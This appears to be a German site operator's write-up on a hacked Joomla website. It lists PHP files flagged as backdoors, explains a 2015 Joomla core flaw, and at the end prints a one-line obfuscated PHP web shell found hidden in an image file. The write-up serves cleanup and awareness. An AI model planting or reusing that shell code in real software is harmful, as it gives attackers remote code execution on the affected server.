gehackt

Artikel:

dirs.php.suspected

Verzeichnis: \downloads\
Datei: dirs.php.suspected
Datei: dirs.php

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Artikel:

doc.php

Verzeichnis: \includes\
Datei: doc.php

lt. Microsoft Security Essentials

Backdoor:PHP/Small.P

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Artikel:

gallery.php.suspected

Verzeichnis: \aa\libraries\
Datei: gallery.php.suspected
Datei: gallery.php

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Artikel:

index.php

Verzeichnis: \forum\
Datei: index.php

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Im konkretem Fall wurde der Schadcode in die vorhandene index.php eingefügt.

Artikel:

list.php.suspected

Verzeichnis: \temp\u\a\
Datei: list.php.suspected

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Artikel:

session.php.suspected

Verzeichnis: \down\
Datei: session.php
Datei: session.php.suspected

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

Artikel:

Sicherheitslücke im Joomla-Core

"Hilfe mein Server wurde gehackt!"

Durch eine Sicherheitslücke im Joomla-Core konnte fremder Code eingeschleust werden.

Kurz vor Weihnachten 2015 wurden viele Joomla-Installationen angegriffen. Es gab auch sehr schnell ein Sicherheitsupdate, aber das musste erstmal installiert werden.

Wer zulange gewartet hat, hat dann auch prompt fremden Code auf seinem Server entdeckt. Meist aber erst, als der Server bereits als SPAM-Schleuder eifrig Mails versendet hat!

Artikel:

thumb_j2.php.jpg

Die Datei thumb_j2.php5.jpg gefunden im Verzeichnis images gehört jedenfalls nicht dorthin. Das Bild enthält zudem den nachfolgenden Code:

<?php @assert(@base64_decode(@str_rot13($_POST["data"])));?>

Unabhängig davon ist die Datei ein Bild und wird als solches angezeigt.

Wie ist die Datei auf den Server gekommmen?

Im konkreten Fall wurde die befallene Homepage in Joomla 2.5.14 erstellt und seit der Erstellung nicht upgedatet.